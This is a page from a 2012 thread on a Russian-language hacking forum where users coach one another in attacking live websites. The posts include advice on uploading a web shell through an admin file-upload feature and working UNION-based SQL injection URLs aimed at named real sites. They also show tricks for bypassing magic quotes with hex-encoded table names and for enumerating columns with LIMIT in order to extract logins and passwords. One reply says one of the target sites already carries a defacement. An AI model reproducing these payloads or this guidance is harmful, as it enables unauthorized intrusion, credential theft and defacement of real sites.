HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1919 из 2438 « Первая < 9191419181918691909 1915 1916 1917 1918 1919 1920 1921 1922 1923 1929196920192419 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #19181  
Старый 09.01.2012, 15:31
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,
 
Ответить с цитированием

  #19182  
Старый 09.01.2012, 15:35
York
Guest
Сообщений: n/a
Провел на форуме:
4045

Репутация: 0
По умолчанию
Очень часто сталкиваюсь вот с такой проблемой, при запросе вида.php?id=-1+union+select+1,2,group_concat(column_name)+from+ information_schema.columns+where+table_name='Shop_ user'+--+

Пишет ошибку:

ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'Shop_user\' --' at line 1

Тоесть ругается на кавычки чтоль? Пробывал 'Shop_user' шифровать. При шифровке выводится стиль страницы с пустым содержимым. Тоесть на месте принтабельного поля ничего нету. Помогите пожалуйсто.
 
Ответить с цитированием

  #19183  
Старый 09.01.2012, 15:38
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от pirat0  
pirat0 said:
помогите залить шелл, есть права админа, есть форум (какой-то самописный походу), есть даже загрузка файлов, но блин куда файлы заливаются не могу понять, дело в том что они вызиваются функцыей files.php?act=3,
Попробуй подставить в параметр act имя несуществуещего файла или подставь кавычку, слеши, вообщем вызови таким образом ошибку. После этого увидишь путь Failed to open stream.. бла бла... /home/path/htdos/files/nesuch_file.php

Если не поможет, то попробуй угадать названия папок, может листинг есть.

2York,

у тебя mq=on, поэтому загони имя таблицы в hex. Тогда синтаксис будет таков:

Код:
Code:
table_name=0x53686f705f2075736572--+a
 
Ответить с цитированием

  #19184  
Старый 09.01.2012, 15:51
York
Guest
Сообщений: n/a
Провел на форуме:
4045

Репутация: 0
По умолчанию
Не.. никак.. вот ссыль

http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+
 
Ответить с цитированием

  #19185  
Старый 09.01.2012, 15:55
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
Цитата:
Сообщение от York  
York said:
Не.. никак.. вот ссыль
http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6f705f2075736572+--+
http://neoklimat.ru/pages.php?id=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x53686F705F75736572 +limit+0,20+--+

вот так катит просто перебором делай, через limit
 
Ответить с цитированием

  #19186  
Старый 09.01.2012, 15:58
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
Ereee, нету там (в моем вопросе) листинга директорий, подставлял неверный запрос просто пустая страница(
 
Ответить с цитированием

  #19187  
Старый 09.01.2012, 15:58
York
Guest
Сообщений: n/a
Провел на форуме:
4045

Репутация: 0
По умолчанию
Спасибо
 
Ответить с цитированием

  #19188  
Старый 09.01.2012, 15:58
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
2pirat0,

скинь URL в ЛС.

2York,

Все выводится:

http://neoklimat.ru/pages.php?id=-1+union+select+1,group_concat(column_name),3+from+ information_schema.columns+where+table_name=0x5368 6F705F75736572--
 
Ответить с цитированием

  #19189  
Старый 09.01.2012, 16:00
York
Guest
Сообщений: n/a
Провел на форуме:
4045

Репутация: 0
По умолчанию
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+

А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.
 
Ответить с цитированием

  #19190  
Старый 09.01.2012, 16:02
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от York  
York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.
Во-первых синтаксис не верный. Во-вторых в конце запроса имя таблицы нельзя в хекс переводить(да и нафиг нужен).

P.S. Дам твой дефейс стоит, нафиг тебе скулья?
 
Ответить с цитированием
Ответ
Страница 1919 из 2438 « Первая < 9191419181918691909 1915 1916 1917 1918 1919 1920 1921 1922 1923 1929196920192419 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ